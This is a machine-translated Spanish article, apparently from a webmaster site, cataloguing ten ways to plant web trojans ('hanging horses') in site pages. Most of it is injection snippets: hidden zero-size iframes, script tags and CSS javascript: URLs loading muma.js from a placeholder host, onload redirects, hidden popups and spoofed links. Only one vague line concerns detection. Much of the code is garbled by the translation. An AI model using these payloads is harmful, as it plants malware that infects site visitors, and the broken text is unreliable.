Un resumen de los métodos comunes de colgantes de caballos

1: Caballo colgante de marco

<iframe src = directionWidth = 0 Height = 0> </frame>

Entre ellos, se pueden ingresar enlaces malicioso del sitio web en la "dirección"

Dos: JS File Hang

Mientras sea un archivo JS, se puede modificar maliciosamente y se puede colgar el código malicioso. En general, es más probable que el código JS referenciado por todo el sitio esté colgado de troyanos. Podemos verificar la izquierda o la parte inferior del código JS. A las personas malas les gusta ocultar el código malicioso y el código normal con muchos espacios o retorno de carro, por lo que debemos verificar si la página del código JS está alargada deliberadamente, etc.

Tres: cifrado de deformación JS

<Script language = "jscript.encode" src = http: //www.xxx.com/muma.txt> </script>

muma.txt se puede cambiar a cualquier sufijo

Cuatro: el cuerpo cuelga el caballo

<Body Onload = "Window.location = 'Dirección';"> </body>

Cinco: esconder un caballo invisible

top.document.body.innerhtml = top.document.body.innerhtml + '/r/n <iframe src = "http://www.xxx.com/muma.htm/"> </iframe>';

Seis: CSS Hang Horse

cuerpo {

background-image: url ('javascript: document.write ("<script src = http: //www.xxx.net/muma.js> </script>")')}

Este método es más despiadado y difícil de encontrar.

Siete: Jaja Hang Horse

<Script Language = JavaScript>

Window.open ("Dirección", "", "Barra de herramientas = no, ubicación = no, directorios = no, status = no, menuBar = no, scro llbars = no, ancho = 1, altura = 1");

</script>

Ocho: disfraz de imágenes

<html>

<iframe src = "博题题题题" altura = 0 width = 0> </iframe>

<img src = "dirección de imagen"> </center>

</html>

Nueve: llamada disfrazada

<Frameset Rows = "444,0" cols = "*">

<Frame src = "Open Webpage" FrameBorDer = "No" Scrolling = "Auto" Noresize MarginWidth = "0" MargingHeight = "0">

<Frame src = "Net Horse Dirección" FrameBorDer = "No" Scrolling = "No" Noresize MarginWidth = "0" MargingHeight = "0">

</Frameset>

Diez: engaño avanzado

<a href = "http://www.163.com (confundido la dirección de conexión, muestre esta dirección apunta a la dirección troyana)" onmouseover = "www_163_com (); return true;"> qué mostrar en la página </a>

<Script language = "javaScript">

función www_163_com ()

{

var url = "博题题题题题题";

Open (URL, "NewWindow", "Barra de herramientas = no, ubicación = no, directorios = no, status = no, menuBar = no, scrollbars = no, resizable = no, copyHistory = sí, ancho = 800, altura = 600, izquierda = 10, top = 10");

}

</script>

¿Cómo descubrir el comportamiento anterior? Si varias páginas tienen códigos de caballos, se requieren herramientas de reemplazo por lotes. Se recomienda que lo use.

Algunas descargas del canal del servidor del nuevo sitio webmaster (se pueden descargar más software en s.vevb.com)

Artículos que pueden ser de interés para usted:

El método de colgación de caballos de la página web está organizado y la introducción detallada de las cookies JS Página web común Código de colgación de caballos de troyano se carga una vez cada 24 horas al día. Varias herramientas que impiden códigos colgantes de caballos de página web son pequeñas colecciones de códigos colgantes de caballos. Página web Análisis de análisis de caballos DOS para el comando para realizar los segmentos de red del puerto de escaneo. Se utiliza para ayudar a resolver el último método de colgación de caballos no autorizado. Código de limpieza de caballos por lotes y de limpieza de caballos por lotes bajo PHP. CSS se da cuenta del método de reemplazo del campo de contenido en la base de datos del colgante de caballos. SQL inyecta el último método de asesinato por virus de virus SXS. Resumen de los métodos para prevenir el ahorcamiento de caballos de la página web.